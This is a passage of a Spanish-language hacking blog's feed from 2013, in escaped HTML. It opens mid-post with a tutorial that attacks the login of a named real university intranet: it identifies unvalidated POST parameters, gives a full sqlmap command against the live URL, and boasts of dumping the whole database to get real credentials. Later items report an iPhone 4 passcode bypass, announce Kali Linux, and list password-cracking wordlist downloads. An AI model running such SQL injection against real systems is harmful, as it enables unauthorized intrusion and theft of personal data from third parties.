Ahora, para seguir probando si el LOGIN tiene algún otro tipo de vulnerabilidad, regresamos al form y dejamos en blanco el usuario y clave y le cliqueamos en Conectar, la cual el servidor nos muestra lo siguiente:&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i45.tinypic.com/4jke2r.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="336" src="http://i45.tinypic.com/4jke2r.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
¿Algo raro cierto? ¿Por que? ... Este LOGIN nos demuestra que las peticiones no están validadas, quiere decir que si colocamos algún bypass, esta nos muestra una vulnerabilidad, como también si dejamos los form en blanco y cliqueamos en conectar, esta nos permite saltarnos del login.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Bien, después de haber llegado a unas pequeñas conclusiones sobre que el servidor tiene una vulnerabilidad en el login y que las peticiones no están validadas, procederemos a utilizar el &lt;a href="https://addons.mozilla.org/es/firefox/addon/live-http-headers/"&gt;Live HTTP Headers&lt;/a&gt;&amp;nbsp;para así ver las cabeceras del login al momento que cliqueemos en Conectar.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En este caso después de haber colocado el &lt;a href="https://addons.mozilla.org/es/firefox/addon/live-http-headers/"&gt;Live HTTP Headers&lt;/a&gt;&amp;nbsp;a la escucha de lo que pasa por el servidor mientras cliqueamos en Conectar dejando todo el blanco, esta nos devuelve lo siguiente:&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i47.tinypic.com/28uo37b.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="492" src="http://i47.tinypic.com/28uo37b.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
Hemos obtenido 3 datos muy importantes! las cuales son:&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="color: lime;"&gt;http://www.uap.edu.pe/intranet/logon2.asp&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="color: lime;"&gt;POST /intranet/logon2.asp HTTP/1.1&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="color: lime;"&gt;usuario=&amp;amp;pw=&amp;amp;user=07&amp;amp;B7=++Conectar++&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;span style="text-align: justify;"&gt;La primera es posiblemente la URL Vulnerable, la segunda nos indica que la variable es POST y el ultimo, los parámetros que posiblemente son vulnerables.&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Entonces procederemos a explotar la vulnerabilidad automatizadamente que se encuentra en el LOGIN, utilizando SQLMAP y ejecutando el siguiente comando basándonos en los datos obtenidos por el Live HTTP Headers.&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="color: lime;"&gt;./sqlmap.py -u "http://www.uap.edu.pe/intranet/logon2.asp" --data="usuario=&amp;amp;pw=&amp;amp;user=07&amp;amp;B7=++Conectar++" -p "usuario" --level=5 --risk=5 --dbs&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i49.tinypic.com/dtzi8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="380" src="http://i49.tinypic.com/dtzi8.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Después de que la herramienta termine de auditar el servidor, esta detectara que el parámetro POST "usuario" es vulnerable, tal cual se muestra en la siguiente imagen:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i47.tinypic.com/2elh9ck.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="306" src="http://i47.tinypic.com/2elh9ck.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
A partir de allí, ya sabemos que dicho LOGIN es realmente vulnerable y lo hemos explotado con total satisfacción obteniendo así toda la base de datos del servidor.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i49.tinypic.com/2ebhn5x.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="474" src="http://i49.tinypic.com/2ebhn5x.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div style="text-align: justify;"&gt;
Ahora si! con esta DB obtendremos los respectivos datos reales para poder logearnos satisfactoriamente en el LOGIN que tanto deseamos ;)&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Espero les sirva.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Saludos.&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;a href="https://twitter.com/CalebDrugs"&gt;@CalebDrugs&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/92vN7k6HTGs" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-26T23:13:09.400-03:00</app:edited><media:thumbnail url="http://i48.tinypic.com/259lw8z_th.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2013/03/sqli-utilizando-metodo-post-con-sqlmap.html</feedburner:origLink></item><item><title>Saltarse la contraseña (passcode) en iPhone 4 con iOS 6.1.3 </title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/kyoZFUAWCg4/saltarse-la-contrasena-passcode-en.html</link><category>Tips</category><category>Trucos</category><category>Bug</category><category>Hack Tips</category><category>Noticias</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Sun, 24 Mar 2013 12:48:10 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-3629963367917160821</guid><description>&lt;div style="text-align: justify;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-P0JDWkwQlv0/UU9We_b96CI/AAAAAAAAB7I/xbSHsMFyjkk/s1600/iphone-pin-lock-security_1020_large_verge_medium_landscape.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="164" src="http://3.bp.blogspot.com/-P0JDWkwQlv0/UU9We_b96CI/AAAAAAAAB7I/xbSHsMFyjkk/s640/iphone-pin-lock-security_1020_large_verge_medium_landscape.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Hace más un mes publiqué un bug donde se podía &lt;a href="http://www.blackploit.com/2013/02/saltandose-la-contrasena-de-un-ios-61.html" target="_blank"&gt;&lt;b&gt;evadir fácilmente la (contraseña) passcode de los dispositivos con iOS 6.1&lt;/b&gt;&lt;/a&gt;, recientemente para arreglar dicha vulnerabilidad es que ha salido el &lt;b&gt;iOS 6.1.3&lt;/b&gt;, pero tan pronto como salió es que se encontró una forma de &lt;b&gt;saltarse la pantalla de bloqueo del iPhone 4&lt;/b&gt;.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;

&lt;div style="text-align: center;"&gt;
&lt;iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/QCGJTuTZf8M" width="640"&gt;&lt;/iframe&gt;

&lt;/div&gt;
&lt;/div&gt;


&lt;div style="float:left; margin:5px;"&gt;
&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 250 x 250 */
google_ad_slot = "9258007445";
google_ad_width = 250;
google_ad_height = 250;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
El fallo se produce sólo en los terminales que no tienen &lt;i&gt;&lt;b&gt;Siri&lt;/b&gt;&lt;/i&gt;, es decir, hasta &lt;i&gt;&lt;b&gt;iPhone 4&lt;/b&gt;&lt;/i&gt;, y no en &lt;i&gt;&lt;b&gt;iPhone 4S&lt;/b&gt;&lt;/i&gt; o &lt;i&gt;&lt;b&gt;iPhone 5&lt;/b&gt;&lt;/i&gt;, y vuelve a producirse al generarse el evento de &lt;i&gt;&lt;b&gt;No SIM&lt;/b&gt;&lt;/i&gt; cuando se realiza una llamada con el &lt;i&gt;&lt;b&gt;Control de voz&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
Como en otras ocasiones, este bug no permite acceder a todo el sistema  
operativo, pero sí que permite acceder a la agenda de contactos y las  
fotografías. Lo peor de todo es el mal ruido que genera entre la opinión
  pública al ver que &lt;i&gt;&lt;b&gt;Apple&lt;/b&gt;&lt;/i&gt; arregla un fallo e introduce otro similar. &lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;Fuente:&lt;/b&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://arstechnica.com/apple/2013/03/one-day-after-ios-6-1-3-a-new-iphone-lock-screen-bug-emerges/" target="_blank"&gt;http://arstechnica.com/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.seguridadapple.com/2013/03/como-saltarse-el-passcode-en-iphone-4.html" target="_blank"&gt;http://www.seguridadapple.com/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/kyoZFUAWCg4" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-24T16:48:10.274-03:00</app:edited><media:thumbnail url="http://3.bp.blogspot.com/-P0JDWkwQlv0/UU9We_b96CI/AAAAAAAAB7I/xbSHsMFyjkk/s72-c/iphone-pin-lock-security_1020_large_verge_medium_landscape.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2013/03/saltarse-la-contrasena-passcode-en.html</feedburner:origLink></item><item><title>Kali Linux, Nueva Distribución de Pentesting de los creadores de Backtrack</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/j1RgjXqQLbw/kali-linux-nueva-distribucion-de.html</link><category>Distro Linux</category><category>Noticias</category><category>Linux OS</category><category>BackTrack</category><category>Kali</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Wed, 13 Mar 2013 11:08:15 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-8883546498426621039</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-tetu9HNXSTw/UUC9m853hPI/AAAAAAAAB6o/V1SyvKe0DjA/s1600/bt-eol-blog-300x115.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-tetu9HNXSTw/UUC9m853hPI/AAAAAAAAB6o/V1SyvKe0DjA/s1600/bt-eol-blog-300x115.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Hace ya algún tiempo se anunciaba en el blog oficial de&amp;nbsp;&lt;b&gt; Offensive Security&lt;/b&gt; (creadores de &lt;b&gt;Backtrack&lt;/b&gt;) que saldría una nueva Distribución GNU/linux de Pentesting que se llamaría &lt;b&gt;Kali&lt;/b&gt;, esta es descrita por sus mismo creadores como la más avanzada, robusta y estable distribución para Pentesting a la fecha.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Kali Linux&lt;/b&gt; ya está disponible para su descarga y trae consigo más de 300 herramientas de pentesting, han cambiado el entorno de Bactrack basado en Ubuntu 10.04 LTS por un sistema Debian y ahora trae soporte para ARM.&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;


&lt;div style="clear: both; text-align: center;"&gt;
&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;
&lt;/div&gt;
&lt;span style="font-size: x-large;"&gt;&lt;a href="http://www.kali.org/downloads" target="_blank"&gt;&lt;b&gt;Descarga Kali Linux v1.0&lt;/b&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Página oficial:&lt;/b&gt; &lt;a href="http://www.kali.org/" target="_blank"&gt;http://www.kali.org/&lt;/a&gt;&lt;br /&gt;
&lt;b&gt;Documentaciòn en Español:&lt;/b&gt; &lt;a href="http://es.docs.kali.org/introduction-es" target="_blank"&gt;http://es.docs.kali.org/introduction-es&lt;/a&gt;&lt;br /&gt;
&lt;b&gt;Repositorios Git:&lt;/b&gt; &lt;a href="http://git.kali.org/gitweb/" target="_blank"&gt;http://git.kali.org/gitweb/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-8gKx4f5PBYE/UUDACqrRBHI/AAAAAAAAB64/xddQ8FNZyNQ/s1600/Download+Kali+Linux,+from+the+creators+of+BackTrack.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="484" src="http://1.bp.blogspot.com/-8gKx4f5PBYE/UUDACqrRBHI/AAAAAAAAB64/xddQ8FNZyNQ/s640/Download+Kali+Linux,+from+the+creators+of+BackTrack.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/j1RgjXqQLbw" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-13T15:08:15.837-03:00</app:edited><media:thumbnail url="http://2.bp.blogspot.com/-tetu9HNXSTw/UUC9m853hPI/AAAAAAAAB6o/V1SyvKe0DjA/s72-c/bt-eol-blog-300x115.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2013/03/kali-linux-nueva-distribucion-de.html</feedburner:origLink></item><item><title>Diccionarios para Realizar Ataques de Fuerza Bruta - Brute Forcing Word List Resources</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/HU1tqSrTzkQ/diccionarios-para-realizar-ataques-de.html</link><category>Herramientas</category><category>Seguridad Web</category><category>Noticias</category><category>Fuerza Bruta</category><category>Seguridad</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Tue, 05 Mar 2013 16:16:27 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-3189972999263410926</guid><description>&lt;div style="text-align: justify;"&gt;
&lt;a href="http://4.bp.blogspot.com/-HRxc-sP2omA/UTaI1Fj1ppI/AAAAAAAAB6Y/hE1Cnm5zn1s/s1600/Brute+Force.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="120" src="http://4.bp.blogspot.com/-HRxc-sP2omA/UTaI1Fj1ppI/AAAAAAAAB6Y/hE1Cnm5zn1s/s640/Brute+Force.png" width="640" /&gt;&lt;/a&gt; &lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Hace un tiempo hice una lista con &lt;a href="http://www.blackploit.com/2011/02/diccionarios-para-fuerza-bruta.html" target="_blank"&gt;Diccionarios para Realizar Ataques de Fuerza Bruta&lt;/a&gt;, pero algunos links ya no funcionaban y además que tengo nuevos diccionarios que les pueden interesar, sin más que decir, les dejo una recopilación bastante buena:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;a href="http://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm"&gt;Crackstation.net&lt;/a&gt;&lt;/b&gt; ha realizado 2 diccionarios, uno es "&lt;i&gt;pequeño&lt;/i&gt;" y descompreso pesa &lt;b&gt;684 MB&lt;/b&gt; y el otro diccionario es mucho más grande y compreso pesa 9.2 GB, descompreso pesa nada más que &lt;b&gt;15 GB&lt;/b&gt;.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;

&lt;div style="float:right; margin:5px;"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 336 x 280 */
google_ad_slot = "8058258251";
google_ad_width = 336;
google_ad_height = 280;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;

&lt;div style="text-align: justify;"&gt;
&lt;u&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Word&lt;span style="font-size: small;"&gt;List&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;b&gt;15 GB&lt;/b&gt;:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a class="wldl" href="https://mega.co.nz/#%21fMQGhTqK%21M0aeI3vMie3ldGlTArVzhhaDWgE_iCY7_NA6Vm_W_Pg"&gt;
&lt;span style="font-size: small;"&gt;Click Here to Download (Mega)
GZIP-compressed (level 9). 4.2 GiB compressed. 15 GiB uncompressed.
&lt;/span&gt;&lt;/a&gt;&lt;span style="font-size: small;"&gt;
&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;a class="wldl" href="https://thepiratebay.se/torrent/8159583"&gt;
Torrent Mirror
&lt;/a&gt;&lt;/span&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="wldl2" href="http://defuse.ca/files/crackstation.txt.gz"&gt;&lt;span style="font-size: small;"&gt;
HTTP Mirror (very slow)&lt;/span&gt;
&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;u&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Word&lt;span style="font-size: small;"&gt;List &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;684 MB:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;
&lt;a class="wldl" href="https://mega.co.nz/#%213VZiEJ4L%21TitrTiiwygI2I_7V2bRWBH6rOqlcJ14tSjss2qR5dqo"&gt;
Click Here to Download (Mega)&lt;span style="font-size: small;"&gt; &lt;/span&gt;GZIP-compressed. 247 MiB compressed. 684 MiB uncompressed.
&lt;/a&gt;
&amp;nbsp;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;a class="wldl" href="https://thepiratebay.se/torrent/8182231"&gt;Torrent Mirror
&lt;/a&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="wldl2" href="http://defuse.ca/files/crackstation-human-only.txt.gz" style="font-size: 12pt;"&gt;&lt;span style="font-size: small;"&gt;HTTP Mirror (very slow)&lt;/span&gt;&lt;/a&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Aquí les dejo una colección de diccionarios que está en TPB y que es bastante completa:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;u&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Word&lt;span style="font-size: small;"&gt;Lists &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;1.9&lt;/span&gt; MB:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;/div&gt;
&lt;ul style="text-align: justify;"&gt;
&lt;li&gt;&lt;a href="http://thepiratebay.se/torrent/6300469/Collection_of_Wordlist_%28Dictionaries%29___V.2_NEW____for_Cracking_"&gt;Torrent&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Por último dejo la una lista con 10 Webs donde se pueden encontrar diccionarios "&lt;i&gt;sueltos&lt;/i&gt;" de menos peso y variadas temáticas a gusto:&lt;/div&gt;
&lt;br /&gt;

 &lt;br /&gt;
&lt;table border="1" cellpadding="0" cellspacing="0" style="width: 714px;"&gt;&lt;colgroup&gt;&lt;col style="mso-width-alt: 1462; mso-width-source: userset; width: 30pt;" width="40"&gt;&lt;/col&gt;
 &lt;col style="mso-width-alt: 5997; mso-width-source: userset; width: 123pt;" width="164"&gt;&lt;/col&gt;
 &lt;col style="mso-width-alt: 14372; mso-width-source: userset; width: 295pt;" width="393"&gt;&lt;/col&gt;
 &lt;col style="mso-width-alt: 4278; mso-width-source: userset; width: 88pt;" width="117"&gt;&lt;/col&gt;
 &lt;/colgroup&gt;&lt;tbody&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl71" height="20" style="height: 15.0pt; width: 30pt;" width="40"&gt;Lugar&lt;/td&gt;
  &lt;td class="xl72" style="border-left: none; width: 123pt;" width="164"&gt;Web&lt;/td&gt;
  &lt;td class="xl72" style="border-left: none; width: 295pt;" width="393"&gt;Descripción&lt;/td&gt;
  &lt;td class="xl73" style="border-left: none; width: 88pt;" width="117"&gt;Formatos&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="140" style="height: 105.0pt;"&gt;
  &lt;td class="xl74" height="140" style="border-top: none; height: 105.0pt; width: 30pt;" width="40"&gt;1°&lt;/td&gt;
  &lt;td class="xl68" style="border-left: none; border-top: none; width: 123pt;" width="164"&gt;&lt;a href="http://www.skullsecurity.org/wiki/index.php/Passwords" target="_blank"&gt;www.skullsecurity.org&lt;/a&gt;&lt;/td&gt;
  &lt;td class="xl65" style="border-left: none; border-top: none; width: 295pt;" width="393"&gt;En
  la web se pueden encontrar las 500 pass más usadas, amplia variedad de
  diccionarios (por idiomas, actores, porno, etc...), nombres sacados de
  facebook, también tiene una lista con la localización de archivos (linux,
  windows), extenciones de aplicaciones web (phpmyadmin, apache, phpbb etc...),
  sin duda es la web más completa que he visto para encontrar el diccionario
  específico que buscamos para fuerza bruta.&lt;/td&gt;
  &lt;td class="xl75" style="border-left: none; border-top: none; width: 88pt;" width="117"&gt;*.txt.bz2
  *.txt&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="120" style="height: 90.0pt;"&gt;
  &lt;td class="xl74" height="120" style="border-top: none; height: 90.0pt; width: 30pt;" width="40"&gt;2°&lt;/td&gt;
  &lt;td class="xl68" style="border-left: none; border-top: none; width: 123pt;" width="164"&gt;&lt;a href="http://www.insidepro.com/eng/download.shtml" target="_blank"&gt;www.insidepro.com&lt;/a&gt;&lt;/td&gt;
  &lt;td class="xl65" style="border-left: none; border-top: none; width: 295pt;" width="393"&gt;Trae
  consigo diccionarios por idiomas y algunos hecho por la web misma web
  (InsidePro), también trae el mítico diccionario de milw0rm.com y uno de
  hashkiller.com, además también trae un compacto con los nombres de Facebook.
  A mi personalmente me gusta mucho por que es muy ordenada y clara la web.&lt;/td&gt;
  &lt;td class="xl75" style="border-left: none; border-top: none; width: 88pt;" width="117"&gt;*.rar
  -&amp;gt; *.dic&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="80" style="height: 60.0pt;"&gt;
  &lt;td class="xl74" height="80" style="border-top: none; height: 60.0pt; width: 30pt;" width="40"&gt;3°&lt;/td&gt;
  &lt;td class="xl68" style="border-left: none; border-top: none; width: 123pt;" width="164"&gt;&lt;a href="http://packetstormsecurity.org/Crackers/wordlists/" target="_blank"&gt;packetstormsecurity.org&lt;/a&gt;&lt;/td&gt;
  &lt;td class="xl65" style="border-left: none; border-top: none; width: 295pt;" width="393"&gt;Aquí
  se puede encontrar diccionarios de los que se les ocurra (asteriodes, rock,
  mitos y leyendas, cine, jazz, nombres, etc...). El único problemas es que
  tienes que buscarlos en una larga lista sin orden lógico.&lt;/td&gt;
  &lt;td class="xl75" style="border-left: none; border-top: none; width: 88pt;" width="117"&gt;*.txt
  *.txt.gz&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="120" style="height: 90.0pt; mso-height-source: userset;"&gt;
  &lt;td class="xl76" height="140" rowspan="2" style="border-bottom: .5pt solid black; border-top: none; height: 105.0pt; width: 30pt;" width="40"&gt;4°&lt;/td&gt;
  &lt;td class="xl69" style="border-left: none; border-top: none; width: 123pt;" width="164"&gt;&lt;a href="http://www.cotse.com/"&gt;www.cotse.com&lt;/a&gt;&lt;/td&gt;
  &lt;td class="xl66" rowspan="2" style="border-bottom: .5pt solid black; border-top: none; width: 295pt;" width="393"&gt;Una web que ofrece muchos tópicos: Contraseñas
  comunes, los términos de Drogas de la calle, nombres de host, las palabras de
  la Biblia King James, palabras en latín, Minix / usr / dict, nombres de
  películas, música clásica, música country, jazz, música de otros, la música
  rock, espectáculos musicales, mitos y leyendas , apellidos de actores,
  nombres de actor, apellidos anglosajones, entre muchos otros. Nada más un
  poco molesto el desorden.&lt;/td&gt;
  &lt;td class="xl77" rowspan="2" style="border-bottom: .5pt solid black; border-top: none; width: 88pt;" width="117"&gt;*&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl70" height="20" style="border-left: none; height: 15.0pt; width: 123pt;" width="164"&gt;&lt;u style="mso-ignore: visibility; visibility: hidden;"&gt;&amp;nbsp;&lt;/u&gt;&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="60" style="height: 45.0pt;"&gt;
  &lt;td class="xl74" height="60" style="border-top: none; height: 45.0pt; width: 30pt;" width="40"&gt;5°&lt;/td&gt;
  &lt;td class="xl68" style="border-left: none; border-top: none; width: 123pt;" width="164"&gt;&lt;a href="ftp://ftp.openwall.com/pub/wordlists/" target="_blank"&gt;ftp.openwall.com&lt;/a&gt;&lt;/td&gt;
  &lt;td class="xl65" style="border-left: none; border-top: none; width: 295pt;" width="393"&gt;Este
  es el conocido FTP de Openwall que trae un compacto de passwords y una amplia
  variedad de diccionarios por idiomas.&lt;/td&gt;
